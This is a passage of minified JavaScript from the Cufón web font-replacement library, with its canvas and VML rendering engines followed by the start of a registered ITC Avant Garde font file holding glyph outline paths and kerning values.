I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());


Cufon.registerFont({"w":207,"face":{"font-family":"ITC Avant Garde Std Bk","font-weight":300,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 5 2 2 2 2 2 2 4","ascent":"266","descent":"-94","x-height":"5","bbox":"-33 -348 394.063 98","underline-thickness":"18","underline-position":"-18","stemh":"25","stemv":"27","unicode-range":"U+0020-U+0192"},"glyphs":{" ":{"w":103,"k":{"T":33,"V":28,"W":14,"Y":36,"\u00dd":36,"\u0178":36,"A":18,"\u00c6":18,"\u00c1":18,"\u00c2":18,"\u00c4":18,"\u00c0":18,"\u00c5":18,"\u00c3":18}},"!":{"d":"65,-266r0,197r-28,0r0,-197r28,0xm65,-40r0,40r-28,0r0,-40r28,0","w":102},"\"":{"d":"54,-160r-22,0r0,-106r22,0r0,106xm104,-160r-22,0r0,-106r22,0r0,106","w":135},"#":{"d":"139,-93r-12,79r-19,0r11,-79r-43,0r-11,79r-20,0r11,-79r-48,0r2,-19r49,0r5,-41r-48,0r2,-19r49,0r10,-72r20,0r-10,72r43,0r10,-72r20,0r-10,72r49,0r-1,19r-51,0r-6,41r50,0r-2,19r-50,0xm122,-112r6,-41r-44,0r-6,41r44,0"},"$":{"d":"150,-80v-3,-72,-112,-29,-113,-115v0,-36,25,-60,56,-65r0,-32r24,0r0,32v37,5,54,32,55,61r-26,0v-7,-56,-80,-50,-81,2v0,30,24,37,55,47v27,9,58,28,58,68v0,32,-23,64,-61,70r0,35r-24,0r0,-35v-38,-4,-62,-34,-63,-69r27,0v2,65,96,57,93,1"},"%":{"d":"10,-211v0,-34,26,-60,60,-60v35,0,61,25,61,60v0,35,-26,61,-61,61v-34,0,-60,-26,-60,-61xm70,-252v-24,0,-40,17,-40,42v0,23,16,41,40,41v24,0,41,-18,41,-42v0,-24,-17,-41,-41,-41xm144,-56v0,-34,26,-61,61,-61v34,0,61,26,61,61v0,35,-27,61,-61,61v-35,0,-61,-26,-61,-61xm205,-98v-24,0,-41,18,-41,43v0,23,17,41,41,41v24,0,41,-18,41,-42v0,-24,-17,-42,-41,-42xm221,-266r-146,266r-22,0r147,-266r21,0","w":275},"&":{"d":"213,-164r28,0r-47,89r60,61r-19,18r-55,-56v-18,35,-38,57,-81,57v-49,0,-80,-37,-80,-76v0,-44,38,-67,64,-79v-18,-19,-33,-36,-33,-61v0,-33,27,-60,62,-60v36,0,63,27,63,60v0,36,-28,51,-53,63r54,55xm112,-248v-22,0,-36,19,-36,36v0,21,17,35,30,48v29,-14,43,-23,43,-47v0,-19,-15,-37,-37,-37xm162,-70r-62,-64v-40,19,-52,40,-52,62v0,27,22,51,53,51v31,0,46,-18,61,-49","w":263},"(":{"d":"146,-271r0,30v-44,25,-84,83,-84,154v0,70,39,128,84,154r0,31v-151,-73,-150,-297,0,-369","w":158},")":{"d":"13,98r0,-31v44,-26,84,-83,84,-154v0,-69,-39,-127,-84,-153r0,-31v151,73,149,297,0,369","w":158},"*":{"d":"119,-266r-4,47r40,-27r9,17r-42,21r43,20r-10,18r-40,-28r4,48r-20,0r4,-48r-39,28r-11,-18r43,-20r-43,-20r10,-18r40,27r-4,-47r20,0","w":217},"+":{"d":"121,-181r0,78r77,0r0,26r-77,0r0,77r-26,0r0,-77r-77,0r0,-26r77,0r0,-78r26,0","w":216},",":{"d":"67,-40r-27,67r-25,0r23,-67r29,0","w":104,"k":{" ":42}},"-":{"d":"0,-114r98,0r0,26r-98,0r0,-26","w":97},".":{"d":"66,-40r0,40r-28,0r0,-40r28,0","w":104,"k":{" ":42}},"\/":{"d":"25,36r116,-302r30,0r-116,302r-30,0","w":195},"0":{"d":"13,-85r0,-94v0,-77,64,-92,90,-92v43,0,91,30,91,90r0,96v0,70,-60,90,-90,90v-34,0,-91,-22,-91,-90xm43,-180r0,95v0,37,27,63,61,63v28,0,60,-22,60,-63v0,-75,22,-160,-61,-160v-35,0,-60,26,-60,65"},"1":{"d":"93,0r0,-241r-54,0r0,-25r84,0r0,266r-30,0"},"2":{"d":"22,-180v-3,-51,43,-91,86,-91v49,0,82,36,81,82v-1,29,-14,50,-41,76r-88,87r130,0r0,26r-170,0r0,-24r88,-86v24,-23,51,-45,51,-78v0,-35,-23,-57,-54,-57v-31,0,-54,24,-55,65r-28,0"},"3":{"d":"59,-203r-29,0v4,-93,141,-87,141,-3v0,27,-16,46,-37,57v100,40,52,153,-34,154v-44,1,-88,-37,-87,-83r30,0v1,36,29,56,58,56v35,0,57,-26,57,-57v1,-33,-32,-63,-81,-57r0,-23v41,5,64,-23,64,-43v0,-24,-16,-43,-40,-43v-28,0,-41,21,-42,42"},"4":{"d":"135,0r0,-50r-132,0r0,-23r130,-193r30,0r0,192r29,0r0,24r-29,0r0,50r-28,0xm34,-74r102,0r0,-156"},"5":{"d":"48,-266r128,0r0,25r-105,0r-15,79v9,-6,23,-16,50,-16v55,0,89,46,89,90v0,48,-39,93,-94,93v-42,0,-87,-28,-93,-81r30,0v11,78,130,65,127,-11v-2,-60,-75,-95,-117,-38r-24,-6"},"6":{"d":"104,5v-87,0,-112,-100,-70,-161r75,-110r34,0r-66,96v52,-29,120,11,120,80v0,52,-40,95,-93,95xm40,-86v0,35,25,64,63,64v37,0,64,-29,64,-65v0,-42,-32,-66,-63,-66v-28,0,-64,20,-64,67"},"7":{"d":"29,-266r152,0r0,23r-111,243r-32,0r112,-241r-121,0r0,-25"},"8":{"d":"65,-149v-56,-25,-38,-122,39,-122v76,0,94,97,38,122v30,11,48,39,48,71v0,47,-37,83,-86,83v-88,0,-120,-126,-39,-154xm104,-247v-24,0,-44,19,-44,45v0,24,20,43,44,43v24,0,43,-20,43,-44v0,-25,-19,-44,-43,-44xm47,-78v0,31,25,56,57,56v32,0,56,-25,56,-56v0,-31,-24,-58,-56,-58v-33,0,-57,27,-57,58"},"9":{"d":"104,-271v85,0,111,100,70,160r-76,111r-34,0r66,-96v-54,27,-120,-12,-120,-81v0,-52,41,-94,94,-94xm103,-113v28,0,66,-20,65,-68v0,-35,-26,-64,-64,-64v-37,0,-64,30,-64,66v0,42,32,66,63,66"},":":{"d":"66,-194r0,40r-28,0r0,-40r28,0xm66,-40r0,40r-28,0r0,-40r28,0","w":104,"k":{" ":29}},";":{"d":"66,-194r0,40r-28,0r0,-40r28,0xm67,-40r-28,67r-24,0r23,-67r29,0","w":104,"k":{" ":30}},"<":{"d":"18,-104r180,-82r0,29r-153,67r153,66r0,29r-180,-82r0,-27","w":216},"=":{"d":"18,-142r180,0r0,25r-180,0r0,-25xm18,-64r180,0r0,25r-180,0r0,-25","w":216},">":{"d":"18,-24r153,-67r-153,-66r0,-29r180,82r0,27r-180,82r0,-29","w":216},"?":{"d":"98,-243v-26,0,-55,18,-53,54r-30,0v1,-110,164,-103,163,-6v0,31,-22,50,-42,69v-26,25,-27,44,-27,58r-28,0v1,-24,6,-44,34,-72v19,-18,33,-31,33,-53v0,-27,-20,-50,-50,-50xm108,-40r0,40r-27,0r0,-40r27,0","w":199},"@":{"d":"246,-58r9,10v-27,39,-78,53,-108,53v-86,0,-138,-67,-138,-136v0,-75,59,-140,140,-140v64,0,125,43,125,114v0,65,-50,99,-80,99v-10,0,-29,-4,-31,-26v-20,34,-89,39,-90,-27v0,-46,34,-95,75,-95v22,0,31,12,37,27r7,-21r19,0r-31,109v0,14,10,16,16,16v22,0,60,-30,60,-82v0,-63,-54,-97,-106,-97v-67,0,-122,52,-122,123v0,61,46,119,119,119v34,0,76,-14,99,-46xm121,-76v46,0,48,-44,58,-81v0,-21,-17,-31,-30,-31v-27,0,-56,35,-56,77v0,28,16,35,28,35","w":280},"A":{"d":"66,-75r-31,75r-32,0r111,-266r29,0r110,266r-32,0r-31,-75r-124,0xm181,-99r-54,-134r-52,134r106,0","w":255,"k":{"v":15,"y":13,"\u00fd":13,"\u00ff":13,"C":14,"\u00c7":14,"G":14,"O":14,"\u00d8":14,"\u0152":14,"\u00d3":14,"\u00d4":14,"\u00d6":14,"\u00d2":14,"\u00d5":14,"Q":14,"T":28,"u":12,"\u00fa":12,"\u00fb":12,"\u00fc":12,"\u00f9":12,"U":12,"\u00da":12,"\u00db":12,"\u00dc":12,"\u00d9":12,"V":36,"w":12,"W":18,"Y":34,"\u00dd":34,"\u0178":34}},"B":{"d":"194,-74v1,76,-84,78,-167,74r0,-266r70,0v84,-13,106,98,46,124v48,15,51,56,51,68xm149,-196v0,-48,-44,-45,-93,-44r0,89v49,4,93,-2,93,-45xm165,-76v0,-51,-53,-53,-109,-50r0,100v54,1,109,5,109,-50","k":{"U":6,"\u00da":6,"\u00db":6,"\u00dc":6,"\u00d9":6,",":10,".":10,"A":11,"\u00c6":11,"\u00c1":11,"\u00c2":11,"\u00c4":11,"\u00c0":11,"\u00c5":11,"\u00c3":11}},"C":{"d":"244,-72r32,0v-17,41,-64,77,-123,77v-79,0,-139,-61,-139,-138v0,-76,59,-138,139,-138v66,0,108,44,123,78r-32,0v-9,-16,-40,-52,-91,-52v-62,0,-109,49,-109,111v0,63,47,112,109,112v56,0,85,-40,91,-50","w":288,"k":{",":5,".":5,"A":17,"\u00c6":17,"\u00c1":17,"\u00c2":17,"\u00c4":17,"\u00c0":17,"\u00c5":17,"\u00c3":17}},"D":{"d":"106,-266v73,-5,137,51,137,132v0,80,-45,134,-135,134r-81,0r0,-266r79,0xm213,-132v0,-85,-61,-118,-157,-108r0,214v94,9,157,-21,157,-106","w":257,"k":{"V":11,"W":3,"Y":18,"\u00dd":18,"\u0178":18,",":24,".":22,"A":15,"\u00c6":15,"\u00c1":15,"\u00c2":15,"\u00c4":15,"\u00c0":15,"\u00c5":15,"\u00c3":15}},"E":{"d":"27,0r0,-266r147,0r0,26r-118,0r0,92r118,0r0,27r-118,0r0,95r118,0r0,26r-147,0","w":194},"F":{"d":"27,0r0,-266r135,0r0,26r-106,0r0,93r105,0r0,27r-105,0r0,120r-29,0","w":175,"k":{"\u00eb":7,"\u00e3":7,"\u00e0":7,"\u00e4":7,",":67,".":63,"A":25,"\u00c6":25,"\u00c1":25,"\u00c2":25,"\u00c4":25,"\u00c0":25,"\u00c5":25,"\u00c3":25,"a":7,"\u00e6":7,"\u00e1":7,"\u00e2":7,"\u00e5":7,"e":7,"\u00e9":7,"\u00ea":7,"\u00e8":7,"o":7,"\u00f8":7,"\u0153":7,"\u00f3":7,"\u00f4":7,"\u00f6":7,"\u00f2":7,"\u00f5":7}},"G":{"d":"295,-126v-2,78,-72,131,-142,131v-78,0,-139,-60,-139,-139v0,-80,63,-137,140,-137v54,0,104,30,125,74r-34,0v-19,-26,-50,-48,-92,-48v-58,0,-109,44,-109,111v0,134,194,148,217,33r-133,0r0,-25r167,0","w":307,"k":{",":12,".":10,"A":14,"\u00c6":14,"\u00c1":14,"\u00c2":14,"\u00c4":14,"\u00c0":14,"\u00c5":14,"\u00c3":14}},"H":{"d":"56,0r-29,0r0,-266r29,0r0,118r129,0r0,-118r30,0r0,266r-30,0r0,-122r-129,0r0,122","w":241},"I":{"d":"27,0r0,-266r29,0r0,266r-29,0","w":83},"J":{"d":"78,-22v37,-2,44,-24,44,-58r0,-186r30,0r0,180v4,55,-28,89,-76,91v-22,1,-72,-19,-74,-67r32,0v4,29,32,42,44,40","w":177,"k":{"u":4,"\u00fa":4,"\u00fb":4,"\u00fc":4,"\u00f9":4,",":8,".":8,"A":13,"\u00c6":13,"\u00c1":13,"\u00c2":13,"\u00c4":13,"\u00c0":13,"\u00c5":13,"\u00c3":13,"a":3,"\u00e6":3,"\u00e1":3,"\u00e2":3,"\u00e4":3,"\u00e0":3,"\u00e5":3,"\u00e3":3,"e":3,"\u00e9":3,"\u00ea":3,"\u00eb":3,"\u00e8":3,"o":3,"\u00f8":3,"\u0153":3,"\u00f3":3,"\u00f4":3,"\u00f6":3,"\u00f2":3,"\u00f5":3}},"K":{"d":"32,0r0,-266r30,0r0,128r108,-128r33,0r-112,132r123,134r-37,0r-115,-126r0,126r-30,0","w":213,"k":{"y":13,"\u00fd":13,"\u00ff":13,"O":13,"\u00d8":13,"\u0152":13,"\u00d3":13,"\u00d4":13,"\u00d6":13,"\u00d2":13,"\u00d5":13,"u":17,"\u00fa":17,"\u00fb":17,"\u00fc":17,"\u00f9":17,"a":15,"\u00e6":15,"\u00e1":15,"\u00e2":15,"\u00e4":15,"\u00e0":15,"\u00e5":15,"\u00e3":15,"e":15,"\u00e9":15,"\u00ea":15,"\u00eb":15,"\u00e8":15,"o":15,"\u00f8":15,"\u0153":15,"\u00f3":15,"\u00f4":15,"\u00f6":15,"\u00f2":15,"\u00f5":15}},"L":{"d":"27,0r0,-266r30,0r0,240r101,0r0,26r-131,0","w":159,"k":{"y":12,"\u00fd":12,"\u00ff":12,"O":19,"\u00d8":19,"\u0152":19,"\u00d3":19,"\u00d4":19,"\u00d6":19,"\u00d2":19,"\u00d5":19,"T":24,"V":39,"W":19,"Y":34,"\u00dd":34,"\u0178":34,"o":10,"\u00f8":10,"\u0153":10,"\u00f3":10,"\u00f4":10,"\u00f6":10,"\u00f2":10,"\u00f5":10}},"M":{"d":"54,0r-27,0r0,-266r41,0r99,223r98,-223r42,0r0,266r-28,0r1,-237r-104,237r-19,0r-103,-237r0,237","w":333},"N":{"d":"57,-266r156,222r0,-222r29,0r0,266r-29,0r-158,-224r0,224r-28,0r0,-266r30,0","w":268},"O":{"d":"14,-132v0,-82,64,-139,139,-139v78,0,139,60,139,138v0,78,-61,138,-139,138v-79,0,-139,-61,-139,-137xm153,-245v-63,0,-109,49,-109,112v0,63,47,111,109,111v63,0,109,-50,109,-111v0,-61,-46,-112,-109,-112","w":306,"k":{"T":18,"V":17,"W":5,"Y":15,"\u00dd":15,"\u0178":15,",":15,".":15,"A":14,"\u00c6":14,"\u00c1":14,"\u00c2":14,"\u00c4":14,"\u00c0":14,"\u00c5":14,"\u00c3":14,"X":14}},"P":{"d":"194,-186v0,70,-58,88,-140,81r0,105r-30,0r0,-266r70,0v68,-4,100,26,100,80xm166,-185v0,-55,-52,-58,-112,-55r0,109v58,2,112,2,112,-54","w":198,"k":{"\u00e4":6,",":75,".":72,"A":30,"\u00c6":30,"\u00c1":30,"\u00c2":30,"\u00c4":30,"\u00c0":30,"\u00c5":30,"\u00c3":30,"a":6,"\u00e6":6,"\u00e1":6,"\u00e2":6,"\u00e0":6,"\u00e5":6,"\u00e3":6,"e":6,"\u00e9":6,"\u00ea":6,"\u00eb":6,"\u00e8":6,"o":6,"\u00f8":6,"\u0153":6,"\u00f3":6,"\u00f4":6,"\u00f6":6,"\u00f2":6,"\u00f5":6}},"Q":{"d":"315,5v-33,-3,-62,-12,-78,-25v-19,13,-47,25,-80,25v-85,0,-139,-67,-139,-138v0,-76,59,-138,139,-138v80,0,139,61,139,137v0,54,-26,82,-38,95v16,10,31,15,57,18r0,26xm107,-118v66,0,74,18,127,61v69,-61,17,-188,-78,-188v-66,0,-121,62,-103,136v12,-4,29,-9,54,-9xm216,-39v-36,-37,-98,-70,-158,-45v42,75,105,74,158,45","w":315,"k":{",":-3}},"R":{"d":"156,-130v44,-43,14,-122,-60,-110r-42,0r0,240r-30,0r0,-266r70,0v83,-3,105,25,111,85v5,44,-34,83,-75,81r66,100r-33,0r-75,-116v25,0,52,2,68,-14","w":211,"k":{"O":-2,"\u00d8":-2,"\u0152":-2,"\u00d3":-2,"\u00d4":-2,"\u00d6":-2,"\u00d2":-2,"\u00d5":-2,"U":-3,"\u00da":-3,"\u00db":-3,"\u00dc":-3,"\u00d9":-3,"V":3,"W":-2,"Y":5,"\u00dd":5,"\u0178":5}},"S":{"d":"49,-200v0,69,133,36,131,127v0,44,-33,78,-83,78v-45,0,-81,-28,-83,-79r30,0v4,44,36,53,53,53v28,0,53,-20,53,-50v0,-81,-128,-30,-131,-127v-3,-91,147,-103,155,-4r-30,0v-3,-17,-12,-44,-47,-44v-27,0,-48,18,-48,46","w":192,"k":{",":7,".":10}},"T":{"d":"68,0r0,-240r-65,0r0,-26r161,0r0,26r-66,0r0,240r-30,0","w":166,"k":{"\u00fc":32,"\u0161":19,"\u00f2":30,"\u00f6":30,"\u00e8":30,"\u00eb":30,"\u00ea":30,"\u00e3":30,"\u00e5":30,"\u00e0":30,"\u00e4":30,"\u00e2":30,"y":14,"\u00fd":14,"\u00ff":14,"O":18,"\u00d8":18,"\u0152":18,"\u00d3":18,"\u00d4":18,"\u00d6":18,"\u00d2":18,"\u00d5":18,"u":32,"\u00fa":32,"\u00fb":32,"\u00f9":32,"w":23,",":39,".":41,"A":28,"\u00c6":28,"\u00c1":28,"\u00c2":28,"\u00c4":28,"\u00c0":28,"\u00c5":28,"\u00c3":28,"h":3,"a":30,"\u00e6":30,"\u00e1":30,"e":30,"\u00e9":30,"o":30,"\u00f8":30,"\u0153":30,"\u00f3":30,"\u00f4":30,"\u00f5":30,"c":29,"\u00e7":29,"-":28,"r":21,"s":19,":":24,";":27}},"U":{"d":"203,-98v12,77,-81,137,-147,83v-28,-23,-30,-54,-30,-83r0,-168r30,0r0,168v-5,39,18,76,59,76v40,0,58,-36,58,-76r0,-168r30,0r0,168","w":228,"k":{",":12,".":12,"A":12,"\u00c6":12,"\u00c1":12,"\u00c2":12,"\u00c4":12,"\u00c0":12,"\u00c5":12,"\u00c3":12}},"V":{"d":"109,0r-105,-266r31,0r88,227r89,-227r31,0r-106,266r-28,0","w":246,"k":{"\u00f6":39,"\u00f4":39,"\u00ee":8,"\u00e8":39,"\u00eb":39,"\u00ea":39,"\u00e3":39,"\u00e5":39,"\u00e0":39,"\u00e4":39,"\u00e2":39,"y":5,"\u00fd":5,"\u00ff":5,"G":17,"O":17,"\u00d8":17,"\u0152":17,"\u00d3":17,"\u00d4":17,"\u00d6":17,"\u00d2":17,"\u00d5":17,"u":21,"\u00fa":21,"\u00fb":21,"\u00fc":21,"\u00f9":21,",":56,".":56,"A":36,"\u00c6":36,"\u00c1":36,"\u00c2":36,"\u00c4":36,"\u00c0":36,"\u00c5":36,"\u00c3":36,"a":39,"\u00e6":39,"\u00e1":39,"e":39,"\u00e9":39,"i":8,"\u00ed":8,"\u00ef":8,"\u00ec":8,"o":39,"\u00f8":39,"\u0153":39,"\u00f3":39,"\u00f2":39,"\u00f5":39,"-":26,"r":17,":":21,";":24}},"W":{"d":"78,0r-73,-266r30,0r61,225r58,-225r22,0r60,225r60,-225r30,0r-75,266r-29,0r-57,-216r-57,216r-30,0","w":330,"k":{"\u00fc":13,"\u00f6":22,"\u00ea":22,"\u00e4":21,"y":6,"\u00fd":6,"\u00ff":6,"O":5,"\u00d8":5,